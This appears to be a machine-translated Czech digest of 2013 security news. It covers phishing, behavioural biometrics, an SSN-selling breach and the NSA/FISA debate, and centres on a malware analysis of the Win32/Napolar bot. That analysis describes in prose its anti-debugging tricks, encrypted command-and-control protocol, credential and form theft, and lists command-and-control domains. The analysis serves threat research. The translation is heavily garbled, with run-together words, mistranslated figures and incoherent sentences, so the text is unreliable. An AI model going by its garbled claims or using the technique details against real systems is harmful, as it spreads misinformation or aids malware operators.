" Nedávné útoky přesvědčily oběti , že software nebo pověření , které používáte pro přístup k určité webové stránky je třeba aktualizovat . E-mail obsahuje odkaz pro dokončení aktualizace. Pokud oběti klikněte na odkaz , jsou přesměrováni na podvodné webové stránky , jehož prostřednictvím škodlivého software ( malware) sklízí detaily jako oběti uživatelských jmen a hesel , "FBI varuje .
Na podvody se používají pro sklizeň dat, jako jsou uživatelská jména , hesla a bankovní spojení , ale zločinci také použít k " způsobit narušení nebo krást duševní vlastnictví a obchodní tajemství , "říká FBI .
Po Spear phishing , je " super- kmen " bakterií ohrožuje podnikání, varuje investor objevil poprvé na Žijeme zabezpečení.
Tudy ! Zapomeňte na otisky prstů - mohou naše každodenní návyky být hesla budoucnosti?
27 září 2013 Biometrika | Mobil
Apple Použití čtečky otisků prstů na svém novém iPhone 5S vyvolala šílenství debaty biometrického zabezpečení - nemluvě o některé z nejvíce pracné " hacky " kdy byly vynalezeny , kdy hackeři používají CSI- esque forenzní techniky a latexové tiskárny ke vstupu do ukradené telefony.
Ale biometrické zabezpečení může být mnohem více, než jen měření duhovku nebo otisk prstu - a někteří vědci se domnívají, že systémy, které nepřetržitě monitorují lidské chování může být ještě bezpečnější .
Jednoho dne , může váš smartphone " rozpoznat " vás , jak jste chůze , způsob, jakým vaše prsty klepněte na dotykovou obrazovku - nebo dokonce jen na to jít během dne.
Myšlenka hesla jako " klíč ", který odemknezařízení může brzy zdát staromódní - Vědci na celém světě zkoumají " implicitní identifikaci " , kdy počítač rozpozná vás vaše chování , a to tím, že napadá vás k zadání hesla. Obchodní časopis Quartz popisuje tyto systémy jako " vždy " bezpečnosti.
SilentSense , oznámil v návaznosti na iPhone 5 , pracuje na pozadí na smartphonech a může identifikovat uživatele do 10 odboček dotykovém displeji s 99% přesností , podle Cheng Bo na Illinois Institute of Technology. Systém pracuje s smartphone je gyroskop a akcelerometr k identifikaci uživatelů , a dokonce bere v úvahu jejich chůze , jak chodí , a pozdní proliferace New Scientist .
" Při používání mobilních zařízení , může většina lidí dodržovat určité návyky jednotlivých nevědomě. Běží jako služba na pozadí , SilentSense využívá uživatele app použití a interakci chování s každou aplikaci , a využívá pohybové senzory k měření přístroje reakci, "říká Bo .
Předchozí Navrhovaný systém , Touchalytics pracoval v podobné módě , ale měl 4 % chybovost .
Mnoho " implicitní " identifikační systémy nejsou " neprůstřelný " na vlastní pěst , ale vědci tvrdí , že by mohly být rozšířeny s ostatními daty . Vědci stojí za Touchalytics navrhl rozšiřování těchto systémů s lokalizačních údajů , nebo dokonce i obrázky z front- čelí fotoaparát.
Naše vlastní každodenní rutiny může být použit i jako " hesel " , někteří výzkumníci věří . Google " prediktivní " Google nyní již systém Android nabízí uživatelům připomenutí jít do práce (o sledování jejich movments pomocí GPS ) , a jít domů. Těchto údajů by mohlo být použit jako "heslo" ?
"Většina lidí jsou otroci zvyku - člověk chodí do práce ráno , snad se zastávkou v kavárně , ale téměř vždy pomocí sameroute . Jakmile se v práci , mohla by zůstat v obecném okolí svého kancelářské budovy až do oběda . V odpoledních hodinách , možná zavolá domů a zvedne své dítě ze školy , "říká Markus Jakobsson z Palo Alto Research Centre.
Jakobsson analyzovala několik technik pro identifikaci uživatele přes smartphone použití , a zjistil, GPS za nejspolehlivější .
Jakobsson tvrdí, že tím, že kombinuje teqhniques , je možné uzamknout až 95% protivníků , dokonce i " informovaný cizinec , který si je vědom existence implicitní ověřování a snaží se hry to."
Jiné systémy specificky zaměřuje na uživatele, kteří mohou mít problémy s používáním aktuálních hesel - a výzkumných pracovníků na libanonské univerzitě v Tripolisu , navrhujete systém, který sleduje pohyby rukou a stabilitu , bezpečně identifikovat postižených pacientů, kteří mohou mít problémy s jinými systémy hesla .
" Starší a zdravotně postižené uživatelé musí mít jejich zdravotní profil zabezpečené a snadno přístupné withoutpassword limitation.Behavioral vybrané údaje jsou klávesy analýza , analýza touchgesture a ruční stabilita uznání . Každý uživatel má jiný typ poškození , takjiný profil pomocí smartphonu , " uvádí zpráva .
Bezpečnostní otázky zůstávají nad tím, jak tyto systémy mohou fungovat v praxi . Apple otisků prstů ID systém , například ukládá biometrické údaje ve svém M7 čipu, a je k dispozici pro servery Apple a další aplikace . Systémy, které se spoléhaly na shromažďování více komplexní data stále nemusí být schopen zajistit data tímto způsobem, a tím mohou zvýšit obavy týkající se soukromí , podle Quartz .
V jiných souvislostech , například "vždy " systémy mohou poskytovat takovou úroveň bezpečnosti, která Heslo nebo jednorázové biometrické systémy nemůže vyhovět .
Skener mozkových vln by mohly být použity pro zvýšení bezpečnosti v autech, podle výzkumníků na University Tottori - a dokonce zabránit carjackings , nelicencované ovladače berou na kolo, nebo nehod zaviněných řidiči s usínáním .
Ale pro některé systémy , metody ověřování , jako jsou snímače oční duhovky a rozpoznávání otisku prstu jsou nedostatečné , Isao Nakanishi na Graduate School of Engineering uvádí v článku v časopise International Journal of biometrie .
Mnoho společností , které nabízejí biometrické a dvoufaktorové řešení nahradit a / nebo rozšířit stávající heslo systémy - například Bionym náramek , který používá jedinečný vzor tep jako heslo .
Stephen Cobb, Senior Security Výzkumný pracovník s ESET říká, že může být na pokraji rozsáhlé nasazení biometrických údajů . Cobb říká: " Úspěšné zavedení biometrických prvků v segmentu vedoucí výrobku může nevěstí nic dobrého pro spotřebitele přijetí. "
A dodává : " Byl jsem fanouškem těchto údajů jako přidanou autentizační faktor od doby, kdy jsem poprvé zkoumal multi- faktor a 2fa systémy před 20 lety , ale uživatel přijetí je velmi citlivá na výkon , jinými slovy iPhone 5S mohli postoupit biometrii , nebo dát spoustu lidí mimo biometrie . "
Pomoc pro malé kluky : Malé a střední podniky nabízené " cyber pojištění " - začíná na 800 dolarů
27 září 2013 IT
Malé a střední podniky budou moci koupit " kybernetické ujištění " balíčky k ochraně proti možným ztrátám z kybernetických útoků - s britskou pojišťovací balíčky firma nabízet začíná na 500 liber ($ 800) .
Cyber Zajištěná byla zahájena NCC Group a je Spojené království je první kybernetické zajištění balíček specificky zaměřené na malé a střední podniky . Balíček bude zahrnovat posouzení rizik, a rady , jak se chránit proti útokům hackerů .
Počítačová kriminalita stojí malým podnikům v průměru o 4,000 libra ($ 6000) ročně , podle britského Federace malých podniků ( FSB) .
ESET nabízí vlastní "cestovní mapu " pro malé a střední podniky na pomoc s bezpečností . ESET výzkumný pracovník Stephen Cobb říká: " Trestní hacking je dělat titulky s depresivní frekvencí v těchto dnech, takže úkolem zabezpečení vašeho podnikání před zločinci může zdát skličující , zvláště pokud vaše firma je skromné velikosti , druh místa, které nemá bezva tým bezpečnostních expertů na počítačové zaměstnance. "
Britská Federace malých podniků ( FSB) Zpráva zjistila, že 41 procent z členství FSB byloobětí počítačové kriminality v posledním roce - uvedení průměrnou cenu kolem 4000 libra ($ 6000) za podnikání. Mezi nejčastější hrozbou je virové infekce , s 20 % malých podniků se stanou obětí . Osm procent byli obětí hacking a pět procent trpí narušení bezpečnosti.
Rob Bavlna, generální ředitel společnosti NCC Group, řekl : "Mnoho malých a středních podniků byly ignoroval ohrožení své IT infrastruktury, protože prostě nechápou jejich vystavení . Domnívají se, že nejsou uskutečnitelné cíle , a nebudou považovat pojištění vzhledem k nákladům " .
Příspěvek Pomoc Goliáš : malé a střední podniky nabízejí " cyber pojištění " - začíná na 800 dolarů poprvé objevil na Žijeme zabezpečení.
Miliony ID záznamů o prodeji , jako pět velkých datových firem hacknutý " měsíce "
27 září 2013 Hacking | Bezpečnost
" Krádež identity service ", která se specializuje na prodej osobní údaje získali přístup k některé z největších firem v Americe spotřebitelských dat , včetně Lexis Nexis a Kroll - a měl přístup k jejich počítačové systémy " měsíce " , podle zprávy .
Tato stránka ukradl 3100000 datum -of- narození záznamy a přes milión čísla sociálního zabezpečení - a nabídl údaje o slavných Američanů , včetně Michelle Obama , Beyoncé a ředitel CIA. Porušení bylo odkryto v dlouhém vyšetřování bezpečnostní expert Brian Krebs a podala zprávu o Krebs pro bezpečnost .
Krebs zpráva týkající se webových stránek - ssndob [ dot] ms - což Krebs řekl, bylo nabízí osobní údaje o jakémukoli rezidentovi z USA po dobu dvou let , včetně addressses , data narození , úvěrů a ověření , s cenami v rozmezí od 50 ° C do 15 dolarů .
Krebs řekl, že doteď mnozí byli zmateni , kde tato data pochází.
" Ničemy za touto službou krádeže identity ovládat nejméně pět infikovaných systémů v různých US- založené spotřebitelů a podniků, jsou datové agregátory , " píše Krebs . " Minulý měsíc ,analýza sítí, síťové aktivity a pověření používaných správci SSNDOB naznačují, že tito jedinci byli také odpovídá za provoz malý, ale velmi silný botnet -kolekce napadených počítačů, které jsou ovládány dálkově útočníky .
"Tento botnet se zdá být v přímé komunikaci s interními systémy na několika velkých datových makléřů ve Spojených státech . "
Krebs tvrdí, že botnet měl přístup k pěti serverům , dva v vykázala databáze a dva u Dun and Bradstreet , stejně jako jiný server v Altegrity , která poskytuje zaměstnanci screening službu s názvem HireRight podle informačního věku .
Firmy tvrdí, že se vyšetřuje , podle Krebs .
Infosecurity citoval výroky analytik společnosti Gartner Avivah Litan před třemi lety v souvislosti s dostupností informací, jako jsou data narození a čísla sociálního pojištění na zločince , říkat, " " Měl jsem těžké přijít na to, jak mnoho podvodníci byli tak mohli snadno odpovědět na tyto otázky úspěšně , kdy i legitimní uživatelé mají tak těžké době pamatovat správné odpovědi na ně . "
Podle Infosecurity , Latan navrhl, že údaje firmy byli " phishingu " , aby poskytly údaje jako základ pro krádeže identity . " Oni prostě získat přístup k těmto zaměstnancům účty a získat klíče k datovým pokladů " Latan řekl: " Mohou se podívat do cokoli, co je známo o některé z nás , a vyzbrojený těmito informacemi mohou obejít většinu založené na znalostech systémy ověřování pravosti a procesy na základě externích dat z veřejných datových agregátory a úvěrovými institucemi . "
Postu Miliony ID záznamů o prodeji , jako pět velkých datových firem hacknutý " na měsíci " se objevila na prvním místě Žijeme zabezpečení.
Win32/Napolar - Nový bot na bloku
27 září 2013 Viry | BotNet
K dispozici je nová bot na bloku . ESET označuje jako Win32/Napolar zatímco její autor nazývá solarbot . Tento kus malware přišel do naší pozornosti v polovině srpna kvůli jeho zajímavé techniky anti- ladění a kód injekce . Je to v poslední době přitahuje všeobecnou pozornost, když byla diskutována na různých fórech reverzního inženýrství .
Tento malware může sloužit více účelům . Tři hlavní z nich jsou k provádění popření servisních útoků , aby mohly působit jako SOCKS proxy server , a krást informace z infikovaných systémů. Malware je schopen připojit do různých prohlížečích ukrást informace, které jsou předloženy do webového formuláře .
Jsme odhalili mnoho podrobností o tomto bot , protože se stala aktivní na konci července , s in- the-Wild infekce začíná v polovině srpna . Tam byly zprávy o tisíc infekcí , mnoho z nich v Jižní Americe. Mezi země s nejvíce infekcí je Peru, Ekvádor a Kolumbie . Další informace o geografické rozložení na tuto hrozbu lze nalézt na virusradar .
Autor Win32/Napolar používá webové stránky na podporu to. Na webových stránkách vypadá velmi profesionální a obsahuje podrobné informace o bot , včetně nákladů ($ 200 USD za každé sestavení ) a dokonce kompletní změnu -log evoluce kódu.
Přestože jsme dosud viděli přímo Win32/Napolar distribuován ve volné přírodě , je pravděpodobné, že tato hrozba se rozšířila přes Facebook . Vzhledem k tomu, malware má schopnost ukrást Facebook pověření může jeho provozovatel použít tyto pověření k posílání zpráv z napadených účtů a snaží se infikovat oběti přátele. Níže je seznam souborů , které jsme viděli používá tento malware rodiny:
Je zajímavé, že použití zdvojených přípon souborů (* . JPG.EXE , * . TXT.EXE a tak dále) poplést u souboru skutečné rozšíření jestarý trik , který pochází z Windows 95, ale zřejmě stále v provozu. Co je legrační , o použití v tomto konkrétním případě je , že autor Win32/Napolar Nezdá se, že si uvědomit, že . Com je platná , i když poněkud starý, rozšíření pro spustitelné soubory a že tyto názvy souborů by umožnilo jejich provádění , aniž bykdy . EXE . Velmi nedávné blog od našich kolegů v AVAST potvrzuje , že také viděli podobné infekce vektorů .
V tomto blogu , ukážeme některé anti- ladění triky používané Win32/Napolar . Tyto triky byly pozorovány v prvních verzí tohoto malware rodiny. Nejnovější varianty také použít třetí strany packers vyhnout antivirový software a zpomalit ruční reverzní inženýrství .
Budeme pak vysvětlit Win32/Napolar velení a řízení (C & C ) protokol. Na závěr si ukážeme některé z informací, které byly načteny z propagační webové stránky před tím, než byl uveden do režimu offline . Anti- ladění techniky
Při analýze Win32/Napolar binární soubory , první věc, kterou musíte vědět je, že neexistuje žádný platný vstupní bod v záhlaví PE , jak je znázorněno na obrázku níže .
01_original_entrypoint_to_0
První instrukce, které jsou spouštěny při startu binární jsou uloženy v závitu místní funkce Storage ( TLS) . K dispozici jsou dvě TLS přiřazené funkce . První TLS funkce nedělá nic . Druhá funkce dešifruje více kódu pomocí šifrovací algoritmus RC4 a klíč 0xDEADBEEF . Dešifrovat kód je zapsána jako třetí funkce TLS před druhým funkce vrátí , jak je uvedeno v kódu extraktu níže .
02_inserting_third_tls
Třetí TLS Funkce dešifruje zbytek kódu před voláním hlavní část malware. Malware používá jiné triky , aby se sám obtížnější analyzovat :
Veškeré dovozy jsou řešeny v běhu s použitím hash namísto dovozového jmen. Interakce s operačním systémem se většinou provádí přímo voláním neregulérní funkce ntdll knihovny namísto použití standardního API . Vše je kód pozice nezávislé .
Chcete-li zjistitoffset vlastní kód, který bude dešifrovat , Win32/Napolar vyhledává prostřednictvím svého paměti pro operační kód 0 × 55 . Tento operační kód představuje "push EBP ", první instrukce současné funkce v jazyce symbolických instrukcí. Pokud tento pokyn nahrazuje 0xCC ,opcode pro softwarový zarážky budedešifrování kódu nebude fungovat. To je chytrý způsob, jak měnit chování malwaru , pokud je analyzován s debugger a je-li software zarážka je kladen na první instrukce z TLS .
Win32/Napolar má více anti- ladění triky. Chcete-li dynamická analýza těžší , bude Win32/Napolar vytvořit podřízenou proces sám o sobě a bude ladit tuto novou instanci . Screenshot ukazuje volání CreateProcess .
05_create_process_debug_only
Software na ochranu Technika self- ladění bylo vidět dříve, ale v případě Win32/Napolar , trik se děje v hlavní části malware , ne v balírny .
Jakmile je laděný proces zahájen, Win32/Napolar zadejte smyčku, která zpracovává události ladění vrácené funkcí WaitForDebugEvent . Pseudokódu pro smyčku manipulaci ladících událostí je uveden níže.
04_pseudo_code_debug_loop
První událost zpracována tímto kódem je CREATE_PROCESS_DEBUG_EVENT . Tato akce se koná při spuštěníladěný proces . V tomto případě se hlavní proces analyzovat MZ a PE hlavičce odladěné procesu za účelem získání offset a velikost pozice nezávislé kódu. To se pak zařadí další oblasti paměti v odladěné procesu, ve kterém k injekci kódu . Tím se vytvoří dvě kopie stejného kódu ve stejném procesu.
Další akce je EXCEPTION_DEBUG_EVENT . V tomto druhém případě je hlavní proces přepíše první TLS funkce binární tak, aby přesměrování provedení na začátku spustitelný pomocí Push - instrukce RET . To opět dešifruje hlavní tělo škodlivého softwaru a umožňuje to provést v dětském procesu. Jedná se o kód podřízeného procesu , který pak pokračuje injekci se do všech běžících procesů sub- procesy a hákování různé funkce skrýt svou přítomnost v systému a zachytit požadované informace.
Konečně, hlavní proces obdrží EXIT_PROCESS_DEBUG_EVENT událost , zastaví ladění voláním funkce DebugActiveProcessStop a ukončí svůj vlastní proces pomocí NtTerminateProcess .
graf
Jednou z hlavních charakteristik Win32/Napolar je jeho schopnost krást informace , když uživatel vyplní webový formulář ve webovém prohlížeči . Trusteer prohlížeč ochrana pravděpodobně zastaví malware z zachycení těchto informací. To je důvod, proč malware má specifické kontroly pro Trusteer produktů. To bude iterovat všech běžících procesů a zvláště zabít jakýkoliv proces, který má řetězec " Trusteer " v něm. Jsme neměli provádět žádné testy potvrdit , zda tento pokus o zakázání Trusteer produkt společnosti je úspěšný , nebo ne. síť chování
Při komunikaci s jeho velení a řízení serveru , Win32/Napolar používá protokol HTTP . První dotaz odeslán robotem na velení a řízení serveru obsahuje následující informace :
Verze bot Aktuální okna uživatelské jméno infikovaného uživatele název počítače Jedinečný identifikátor bot Verze operačního systému Typ systému , který může být 32 nebo 64 bit . Ve skutečnosti , to bot podporuje oba typy architektury .
Server pak odpoví příkazybot potřebuje vykonat . Tyto příkazy jsou šifrovány pomocí RC4 jebot jedinečný identifikátor používá jako šifrovací klíč . Bot podporuje celou řadu příkazů z informací krádeže a SOCKS proxy , aby odmítnutí služby , download , provádění a aktualizace . Každý příkaz májedinečný identifikátor uložen jako jednoho bajtu a informace po tomto bytu obsahuje parametry příkazů . Následující obrázek znázorňuje dopravní výpis komunikace mezi hostiteli infikovaných Win32/Napolar a jeho řídícím a kontrolním serverem.
06_napolar_POST
Následující obrázek ukazuje dešifrování tohoto příkazu pomocí vhodného klíče. První bajt obsahu přijímaného je 0xC , a to pokyn bot na spaní. Tento parametr je řetězec , " 600 ", který představuje počet sekund, po kterébot potřebuje spát.
07_decrypted_cnc_nop
Viděli jsme nejméně sedmi různých velitelských a kontrolních servery používané Win32/Napolar . Většina z nich zůstali jen on-line na pár dní , aby mohl provozovatel přesunula k nové síti . To by mohlo znamenat, že tato bota je aktivně používán ve volné přírodě . Níže je seznam doménových jmen , kde jsme v poslední době pozorovat velitelské a řídící servery :
dabakhost.be terra - araucania.cl xyz25.com yandafia.com elzbthfntr.com alfadente.com.br
Tam jsou některé odkazy na TVZ v malware kódu. Nejpřesněji , některé konfigurační linky a odkazy na konfigurační soubor pro TOR . Během naší analýzy malwaru , nezdálo se , aby jakékoliv použití těchto údajů. To by mohlo být nějaký spící funkce , která nebyla aktivována ve vzorcích jsme analyzovali . Propagační web
Autor Win32/Napolar se zdá být velmi upřímný , kteří chtějí prodat svůj nový malware. On dal dohromady velmi profesionálně vypadající webové stránky, kde se chlubí , že jeho bot je " profesionální shell kód založený bot " , s odkazem na skutečnostmalware je pozice nezávislé .
08_solar_website1
Na webových stránkách také poskytuje informace pro potenciální zákazníky. Například, kompletní kód pro velení a řízení serveru lze nalézt zde , php skript běží s backend SQL databáze . Kód velení a řízení serveru potvrzuje naší analýzy síťového protokolu používaného Win32/Napolar malware.
Propagační webových stránkách také poskytuje několik příkladů pluginů, které mohou být použity malware operátorů. Zásuvné moduly musí být napsány pomocí programovacího jazyka Delphi . Ukázkové pluginy ukazují, jak lze zobrazit zprávu na infikovaném oběti systému , zjistit, které verze je nainstalován antivirový program na oběti systému , a dokonce, jak ukrást Bitcoin peněženky .
Konečně, webové stránky předložil i kompletní záznam změn provedených bota zdrojového kódu , včetně informací o nových funkcí a oprav chyb . Na webových stránkách se zobrazí první položky v changelogu vyrobený 14. července . To se hodí naše časovou osu , protože jsme viděli první instance této bot ve volné přírodě na začátku srpna. Datum registrace pro název domény , kde je umístěnobsah je první den v srpnu , další náznak toho, žezačátek akce je poslední .
09_solar_website2 závěry
Win32/Napolar je nový bot, který se vynořil v červenci a začal pozorovat ve volné přírodě v srpnu . Má zajímavé techniky pro boj proti reverzní inženýrství . Nejpozoruhodnější bod o tomto malware je, jak otevřeně , že je podporován na webu jeho tvůrcem . Reklama je pravděpodobně stejný , který byl identifikován Dancho Danchev na webroot v červenci . Viděli jsme mnoho zpráv na různých fórech, které podporují tuto bot , kromě existence veřejně přístupné webové stránky. Jak již bylo výše zmíněno v případě Foxxy , to je další dobrý příklad specializace počítačové kriminality operací , kde jsme nyní jasně mít autory , které vytvářejí malware a prodávají je do jiných skupin, které budou provozovat.
Ačkoli tato bot má funkce podobné jiným rodinám jako Zeus či SpyEye , může získat na popularitě , protože její autor se aktivně údržbu, a kvůli jeho snadné použití a jednoduchost , s jakou mohou být vytvořeny pluginy . analyzované soubory
Díky Lubomíra Trebula a Joan Calvetem za pomoc při analýze tohoto malware.
Americké zpravodajské hlavy mluví za zachování FISA 27. září 2013. Špionáž | KyberSecurity Dva protichůdné síly se střetli v otevřeném slyšení čtvrtečním podle amerického senátního Výboru pro zpravodajskou na téma možných legislativních změn cizineckého zákona Intelligence Surveillance.
Jedna strana - vedená výboru předseda Dianne Feinstein a místopředseda Saxby Chambliss a zřejmě couval většina ostatních senátorů sedí na něm - uvedl svou podporu pro aktuální program NSA zaměřené na udržení záznamy každého telefonního hovoru ze strany amerických občanů senátor Feinstein řekl, že se domnívá, že program v souladu se zákonem, a oznámil, že ona a Senator Chambliss pracují na návrhu zákona, který by drobné změny programu - například snížením počtu let Zaznamenaná data jsou uložena a vyžadují NSA zaslat FISC seznam telefonních čísel jsou surveilling, spolu s podrobnými důvodů, proč tak činí -. ale, že pokračování programu by neměly být zpochybňovány další síla zmínil na začátku tohoto článku byl vytvořen dva členové výboru, senátoři Ron Wyden a Mark Udall, které zavedla komplexní právní předpisy ( přehled ) k reformě dohledu domácí zákony a tajné sledování kurt ve středu. Mezi pěti Rozhodce (jít sem pro jejich připravených příkazů), který řeší Výbor byl také ředitel Národní zpravodajské James Clapper, NSA generální ředitel Keith Alexander, a náměstek generální prokurátor James Cole, který se očekávaně obhajoval program. Ve společném prohlášení, zopakovali své úsilí směrem k větší transparentnosti ohledně shromažďování informací za účelem podpory větší důvěra veřejnosti v těchto zpravodajské činnosti, a uvedli, že "protože [Snowdena je] neoprávněné zveřejnění, velké množství informací, které byly dříve klasifikovány o těchto zpravodajských programů je nyní ve veřejné doméně. Tyto neoprávněné zveřejnění již způsobil značné škody pro národní bezpečnost, a nepřesné či neúplné tiskové pokrytí neautorizovaných zveřejnění také podkopala důvěru veřejnosti v venku úsilí o ochranu Američanovo soukromí. " Senátor Wyden zopakovala tím, že "každý státní úředník, který si myslel, že ruší, ústavně vadný systém dohledu by nikdy být zveřejněny ignoroval minulost. "Bez ohledu na mimořádné profesionalitě a vlastenectví tisíců specializovaných zpravodajských profesionálů, vedení vašich agentur vybudoval zpravodajskou sběrný systém, který opakovaně klamal americký lid. Znovu a znovu, byli Američané řekli jednu věc o domácí dohledu na veřejných fórech, zatímco vládní agentury dělal něco jiného v soukromí, "poznamenal. "Nyní se jedná o tajné výklady zákona a porušování ústavních práv Američanů stali veřejnosti , vaše agentury čelit strašlivé důsledky, které nebyly plánované. Došlo ke ztrátě důvěry v naší zpravodajského aparátu tady doma a přátelské zahraničními spojenci, a že důvěra bude trvat čas na obnovu. A podle mého názoru tato ztráta důvěry ohrožuje americkou schopnost shromažďovat zpravodajské informace o skutečné hrozby, a každý člen této komise ví, že jsou velmi reálné hrozby venku. " On také sondoval ředitel Alexander odpovědi na to, zda NSA někdy shromažďovány nebo vyrobené Nějaké plány sbírat buňky-site Američanů informace ve velkém, ale neobdržel přímou odpověď, protože tato záležitost je klasifikována.
Výzkumníci mohou vyřešili klikání problém 27. září 2013. Spam | Hacking Klikněte na podvod je značná zátěž na finance i reklamy a reklamních sítí, ale skupina výzkumníků věří, že se jim podařilo vytvořit jednoduché řešení, které je schopno zjistit všechny aktuálně nejpoužívanější click-spamové programy. "reklamní sítě dnes , bohužel, spoléhají především na bezpečnost přes neznámo k obraně proti click-spam, "poznamenal vědci, a představil ViceROI, algoritmus, který detekuje click-spam útoky pracuje na předpokladu, že spammeři klepněte hledají vyšší návratnost investic než etického podnikání modely vyrovnávají riziko přistižení. "reklamní sítě dnes filtr click-spam reaktivně a ad-hoc způsobem - když je detekován specifický útok (často zaklíněné inzerenta) ad sítě vytváří filtr naladěn na zjištění útok, "vysvětlují. "Reaktivní filtrování poškozuje inzerenty, protože útoky mohou jít nezjištěný měsíců [...] Dále, ad-hoc-point řešení se rychle obejít útočníky, např., aby se zabránilo IP blacklist pomocí distribuované botnet, případně přidáním měsíců před tím, než je útok nově objevený více důvtipný inzerenta. " Kromě toho, je tendence reklamních sítí, "střežit své filtrovací techniky snadno zrušil nikdy nekončící evoluce click-spam malware. Takže vědci měli zajímavou myšlenku bít spammery kde to bolí -. své peněženky ". Viceroi, v podstatě, vlajky vydavatelé s abnormálně vysokým ROI Zatímco vydavatel ROI, je těžké odhadnout, v praxi jsme našli na uživatele příjmy úzké proxy," vysvětlují vědci. "Aby nedošlo k detekci Viceroi, musí click-spammeři snížit jejich jednotlivých uživatelů příjmy jako etického vydavatele. V tom okamžiku, aniž by ekonomická pobídka k posunu riziko přistižení (o přístupy, které doplňují Viceroi), čistý dopad odrazovat od páchání click-spam. " a funguje to. Mají testovali algoritmus spolupracuje s velkým reálném reklamní sítě, a říkají, že technika uvidí šest různých tříd click-spamových útoků - Malware-řízený, search-únos, arbitráž, konverzní podvodům, ad injekci a Zaparkoval-domény - bez dalšího ladění (podrobné případové studie, přečtěte si podrobnou zprávu .) Viceroi nemůže "říkají" pro jistotu, že vydavatelé to skvrny jsou rozhodně na tlačítko-spammery, ale umožňuje reklamní sítě ručně kontrolovat a vyšetřovat mnohem menší počet potenciálních podvodných podniků.
NSA dopis odhaluje detaily analytiků NSA špehuje své i milovníci 27. září 2013. Špionáž | KyberSecurity Podrobnosti o dvanáct evidovaných případů od roku 2003, ve kterém analytici zneužitou sledování amerických zpravodajských agentur schopnosti špehovat své lásky úroků nebo jiných nepovolených předmětů byly odhaleny NSA generální inspektor Dr. George Ellard. mimořádné události byly stručně popsány v dopise na Americký senátor Charles Grassley, který požádal o "vědomé a úmyslné zneužití orgánů dozoru." Dopis zahrnuje případy, vojenských i civilních dodavatelů provádějících SIGINT dotazy na telefonní čísla a e-maily, které patří do jejich stávajících nebo bývalých milenců (většinou cizinci, ale některé státní příslušníky USA, stejně), lidé se sešli v sociálním prostředí (většinou cizinci), relativní americký zpravodajské cíle a v jednom případě, množství (náhodně?) telefonní čísla v zemi tak, že vojenská člen v otázce mohli naučit jazyku dané země. Nazval LOVEINT, byly některé z těchto porušení zjistil přezkoumáním SIGINT auditních logů, ale znepokojující číslo bylo odhaleno znesvětitelům sám během nebo před polygrafické výslechů provedených když museli projít procesem obnovy bezpečnostní prověrka. To nás přivádí k otázce, kolik takových porušení zůstala nepovšimnuta a nehlášené během těchto deseti let? Jako Kevin Poulsen správně poznamenal , tento dopis je "fascinující pohled na to, co se stane, když impuls, který pohání průměrné surfařů se podívat do dávnou ex Milovníci na Facebooku je spojen se silou na oheň se odposlechu s několika stisků kláves. " Je také dobré si uvědomit, že většina civilních zaměstnanců, které byly nalezeny porušení těchto pravidel jsou v důchodu, nebo odstoupil, než oni mohli být disciplinovaní, a že se jen pár případů, ministerstvo spravedlnosti byl informován o zneužití, a rozhodla, že nebude stíhat danou osobu. Vojenské členy, které se zabývají v těchto porušení by obvykle byl potrestán snížením stupně, dob omezení a další povinnost, lhůty od obdržení pouze poloviční plat a být zbavený bezpečnostní prověrky, které vlastnil a přístup k utajovaným informacím zrušeno. Podle Dr. Ellard, jeho kancelář je v současné době vyšetřuje další dva údajné SIGINT zneužívá, a je jedno přezkoumání tvrzení pro případné vyšetřování.
Legislativa má za cíl ukončit hromadné sbírku telefonních záznamů 27. září 2013. Zákony Aby bylo možné obnovit ústavní svobody, které byly narušeny invazivní sledování a ukončení tajné výklad zákonů, které výrazně překračují záměr Kongresu bipartisan skupina zákonodárců, včetně senátorů Ron Wyden (D-Ore.), Mark Udall (D- Colorado), Richard Blumenthal (D-Conn.) a Rand Paul (R-Ky.) zavedly právní předpisy na reformu domácí sledování zákony a tajné sledování kurt.
Inteligence dohled a dozor nad Reform Act zakáže hromadný sběr Američanů záznamů, štít Američané z neoprávněným hledání jejich komunikace a nainstalovat ústavní obhájce argumentovat významných případů před tajnou zahraniční soud Intelligence Surveillance. "The příliš široký kontrolní činnosti, které přicházejí do světla v posledních několika měsících ukázaly, jak široká mezera mezi dodržování ústavních svobod amerických občanů a ochrany národní bezpečnosti se stala, "řekl Wyden. "Účinek může být pocit, nejen významné eroze občanských svobod doma, ale ve snížené důvěryhodnosti americké vlády v zahraničí a významný vliv na americké ekonomické zájmy. Tyto reformy se snaží dohnat náskok a vyhnout falešné volby ochrany bezpečnosti na zachování osobní svobody. " "Tam je rostoucí, bipartisan sentiment v Coloradu a po celé zemi, že způsob, NSA a naše zpravodajské agentury vyvážení Američanů soukromí práva a naše bezpečnost je zásadně v nepořádku. Musíme ukončit NSA sbírku miliony nevinných Američanů soukromé telefonní záznamy a soustředit se na podstatu problému: teroristy a špiony, "řekl Udall." To nejsou vágní a abstraktní ohrožení naší svobody. Tyto zátah vyhledávání se dějí právě teď. . Jsem hrdý na to, aby vedl tuto bipartisan tlak k ochraně soukromí Američanů práv a zajistí, že naše snaha o zabezpečení nemají šlapat naše ústavní svobody " "Nedávné odhalení o NSA přesahy ukazují potřebu silného a účinného dohledu nad státní dozor - dohled nad tím, Ústavní advokát bojovat za občanské svobody Američanů před FISA soudy, "řekl senátor Blumenthal." Tato reforma, stejně jako ostatní členové tohoto legislativního balíčku, zajistí, že NSA a FISA soudy respektují ústavní práva. můžeme chránit i národní bezpečnost a ústavní svobody tím, zda soudy slyšet obě strany, jako je tomu v každé jiné soudní řízení. " "Reforma zahraniční zpravodajské Surveillance Act musí omezit výkonného expanzivní pravomoc zabavit soukromé záznamy v tajnosti a bez důvodného podezření," řekl Paule. "Podporuji reformy na cestě k plné obnově myšlenky zakladatelů" vtěleného do čtvrtého dodatku. " Nedávná odhalení a odtajněné dokumenty ukázaly rozsah zpravodajské komunity je hromadné telefonu a e-mailové záznamy sběrné programy a jejich vliv na ústavních svobod dodržující zákony Američanů. Zákon zakazuje hromadné sbírku záznamů Američanů v jakékoli formě, a přitom kterým vláda získat záznamy o osobách podezřelých z účasti na terorismu nebo špionáže. právní předpisy podmiňují rozsáhlé reformy na provoz Tajemství zahraniční zpravodajské Surveillance soud (FISC), šéf mezi nimi k vytvoření nezávislého advokáta namítat proti vládě významné Fisc případech. FISC v současné době působí v tajnosti a často posuzuje na důležité ústavní ochrany pouze na základě argumentů ze strany vlády . Inteligence Dozor a dohled Reform Act vytvoří ústavní advokáta předložit opačného názoru v případech, kdy je FISC vyložit USA dohledu zákony či ústavu. Bude také nastavit proces tvorby významné FISC rozhodnutí veřejnosti a čímž se sníží vládní závislost na tajném těle dozoru práva. Legislativa také mění zahraničními 